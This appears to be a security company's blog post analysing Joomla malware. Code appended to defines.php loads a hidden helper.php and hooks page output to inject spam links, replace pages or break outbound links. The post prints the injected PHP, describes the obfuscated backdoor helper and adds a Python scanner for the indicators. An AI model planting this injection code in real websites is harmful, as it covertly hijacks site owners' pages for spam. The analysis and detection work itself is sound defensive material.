We found some interesting Joomla malware this week, where Joomla's /includes/defines.php file had this code appended to it (shown here one statement per line, with comments added; the original is packed onto a handful of lines):

// Path to the dropped helper.php, hidden as base64
define('DZR', base64_decode('QzovaW5l[REDACTED]5waHA='));
// Run helper.php with its own output swallowed; it is expected to define RSLT (and optionally DZTR / NIND)
if ( file_exists (DZR) ) { ob_start(); require_once(DZR); ob_end_clean(); }
if ( !defined('RSLT') ) define('RSLT', '');
// Register an output-buffer callback: every page Joomla renders from here on passes through callbck()
ob_start("callbck");
function callbck($buff_obs) {
    // DZTR, if defined, replaces the whole page
    if ( defined('DZTR') ) return DZTR;
    // NIND, if defined, breaks every outbound http link except those to the NIND host
    if ( defined('NIND') ) {
        $buff_obs = ereg_replace("href=\"http", "href=\"_http", $buff_obs);
        $buff_obs = ereg_replace("href='http", "href='_http", $buff_obs);
        $buff_obs = ereg_replace("href=http", "href=_http", $buff_obs);
        $buff_obs = ereg_replace("_http://".NIND, "http://".NIND, $buff_obs);
    }
    // Inject RSLT (the spam links) just before the closing body tag
    return (ereg_replace("</body>", RSLT."\n</body>", $buff_obs));
}

The first line defines a constant “DZR” as “C:/inetpub/wwwroot/[REDACTED]/modules/mod_banners/tmpl/helper.php”.  This was on a Windows server running multiple Joomla sites, and DZR pointed to a file helper.php inside a different site on the same server (mod_banners is a core Joomla module, so a helper.php in that tree is easy to overlook).  Several other sites on the server also had their defines.php infected with code pointing to this same helper.php.

The rest of the code includes helper.php with its output discarded, then registers an output-buffer callback via ob_start("callbck"), so every page the site renders passes through that function before it is sent to the browser.  The callback looks for a constant called “RSLT” (result) and appends it just before the closing “</body>” tag.  Two other constants change its behaviour if helper.php defines them: “DZTR” replaces the entire page output, and “NIND” rewrites every href starting with http to _http, breaking outbound links except those whose URL is http:// followed by the NIND value.  So what does helper.php do?

//Obfuscation provided by FOPO - Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar

We deobfuscated the code enough to find out.  It contains some basic backdoor code, but its main function is to check a number of conditions and then display links obtained from one of the following Russian link-building networks:

  • linkfeed.ru
  • sape.ru
  • trustlink.ru
  • xap.ru
  • proflinks.net


It keeps track of what has been displayed in several log files, and it contacts external servers to obtain fresh links.  It assembles HTML around the links (sometimes hidden with JavaScript that sets the display property to “none”) and returns it to Joomla via the RSLT constant.  The log files live in a temporary directory on the server, in this case “C:/tmp/tmp_server”, and have these names:

  • sess_fc.log
  • sess_fs.log
  • sess_nssp.log
  • sess_nslf.log
  • sess_nstl.log
  • sess_nsxp.log
  • sess_nspl.log
  • sess_fssp.log
  • sess_fslf.log
  • sess_fstl.log
  • sess_fsxp.log
  • sess_fspl.log
  • sess_tr.log
  • sess_(l|s|t|x|p)(32 hex characters)
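The scanner below is an added illustration, not code from the original post or from the malware: it turns the indicators above into something that can be run against a web root.  It decodes the DZR constant out of any includes/defines.php that carries the appended code, flags the ob_start("callbck") hook and the RSLT/DZTR/NIND constant checks, and matches file names against the helper's log list (the fixed names plus the sess_(l|s|t|x|p) + 32 hex characters pattern).  The site names, paths and file contents it writes into a temporary folder are constructed for the demo only; on a real server point scan_tree at the web root and at the tmp directory instead.

```python
import base64
import os
import re
import tempfile

# Indicators lifted from the injected defines.php shown on this page: a DZR
# constant whose value is base64_decode(...), the ob_start("callbck") hook,
# and the RSLT / DZTR / NIND constant names the callback checks.
DZR_RE = re.compile(
    r"define\(\s*'DZR'\s*,\s*base64_decode\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)"
)
MARKER_RE = re.compile(
    r"ob_start\(\s*[\"']callbck[\"']\s*\)|defined\(\s*'(?:RSLT|DZTR|NIND)'\s*\)"
)

# Log files the helper.php writes (names from the list above).
FIXED_LOG_NAMES = {
    "sess_fc.log", "sess_fs.log", "sess_nssp.log", "sess_nslf.log",
    "sess_nstl.log", "sess_nsxp.log", "sess_nspl.log", "sess_fssp.log",
    "sess_fslf.log", "sess_fstl.log", "sess_fsxp.log", "sess_fspl.log",
    "sess_tr.log",
}
# sess_(l|s|t|x|p) followed by 32 hex characters
SESS_HASH_RE = re.compile(r"^sess_[lstxp][0-9a-f]{32}$")


def decode_dzr(source):
    """Return the path hidden in define('DZR', base64_decode(...)), or None."""
    m = DZR_RE.search(source)
    if m is None:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error (bad chars / padding) is a ValueError subclass
        return None


def inspect_defines(source):
    """Classify the contents of an includes/defines.php file."""
    path = decode_dzr(source)
    hits = len(MARKER_RE.findall(source))
    return {"infected": path is not None or hits > 0,
            "dzr_path": path, "marker_hits": hits}


def is_spam_log_name(name):
    """True for the fixed log names or the sess_<l|s|t|x|p><32 hex> pattern."""
    return name in FIXED_LOG_NAMES or SESS_HASH_RE.match(name) is not None


def scan_tree(root):
    """Walk root; collect infected defines.php files and spam-network log files.

    Returns {"defines": [(path, decoded DZR or None)], "logs": [path]}.
    """
    findings = {"defines": [], "logs": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if name == "defines.php" and os.path.basename(dirpath) == "includes":
                with open(full, encoding="utf-8", errors="replace") as fh:
                    info = inspect_defines(fh.read())
                if info["infected"]:
                    findings["defines"].append((full, info["dzr_path"]))
            elif is_spam_log_name(name):
                findings["logs"].append(full)
    return findings


# Constructed sample data (hypothetical site names and paths, not from the page).
DEMO_HELPER_PATH = "C:/inetpub/wwwroot/example-site/modules/mod_banners/tmpl/helper.php"
CLEAN_DEFINES = "<?php\ndefine('JPATH_BASE', dirname(__DIR__));\n"
INJECTED_DEFINES = CLEAN_DEFINES + (
    "define('DZR', base64_decode('%s'));\n"
    "if ( file_exists (DZR) ) { ob_start(); require_once(DZR); ob_end_clean(); }\n"
    "if ( !defined('RSLT') ) define('RSLT', '');\n"
    "ob_start(\"callbck\"); function callbck($buff_obs) { if ( defined('DZTR') ) return DZTR;\n"
    "return (ereg_replace(\"</body>\", RSLT.\"\\n</body>\", $buff_obs)); }\n"
) % base64.b64encode(DEMO_HELPER_PATH.encode()).decode()


def build_demo_tree():
    """Write a clean site, an infected site and a tmp dir into a temp folder."""
    root = tempfile.mkdtemp(prefix="joomla_scan_demo_")
    for site, body in (("site-clean", CLEAN_DEFINES), ("site-infected", INJECTED_DEFINES)):
        inc = os.path.join(root, site, "includes")
        os.makedirs(inc)
        with open(os.path.join(inc, "defines.php"), "w", encoding="utf-8") as fh:
            fh.write(body)
    tmp = os.path.join(root, "tmp", "tmp_server")
    os.makedirs(tmp)
    # two names the helper would write, one unrelated file that must not match
    for name in ("sess_fc.log", "sess_l" + "0" * 32, "sess_other.log"):
        with open(os.path.join(tmp, name), "w"):
            pass
    return root


if __name__ == "__main__":
    result = scan_tree(build_demo_tree())
    for path, dzr in result["defines"]:
        print("infected defines.php:", path, "->", dzr)
    for path in result["logs"]:
        print("spam network log:", path)
```

The DZR regex only matches the exact define() shape seen in this sample, so a variant using a different constant name would slip past it; the ob_start() hook with a named callback is the more durable indicator, and any defines.php that registers an output buffer at all deserves a look.  Decoding the DZR path also tells you which other site on the server hosts the helper.php, which matters because cleaning one defines.php while the shared helper.php survives just means the next site re-serves the links.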


The links seem to be pretty standard spam – online pharmacies, online casinos, payday loans, etc.  Though the link networks are Russian, the spam can be in English or potentially any language.  The purpose of the links is to artificially raise the targets' search-engine rankings by having a variety of unrelated sites link to them.  Because the block is often hidden with display:none, the site owner usually sees nothing in the browser; the injection shows up only in the page source, in a search engine's cached copy, or in the ranking penalty that follows.  And since the infected sites on this server all pointed at one shared helper.php, cleaning a single site's defines.php is not enough: the helper, the log files in the tmp directory, and every other site's defines.php have to be dealt with together.

If you think your site is infected with this or any malicious code, you can always contact us and get help taking care of it.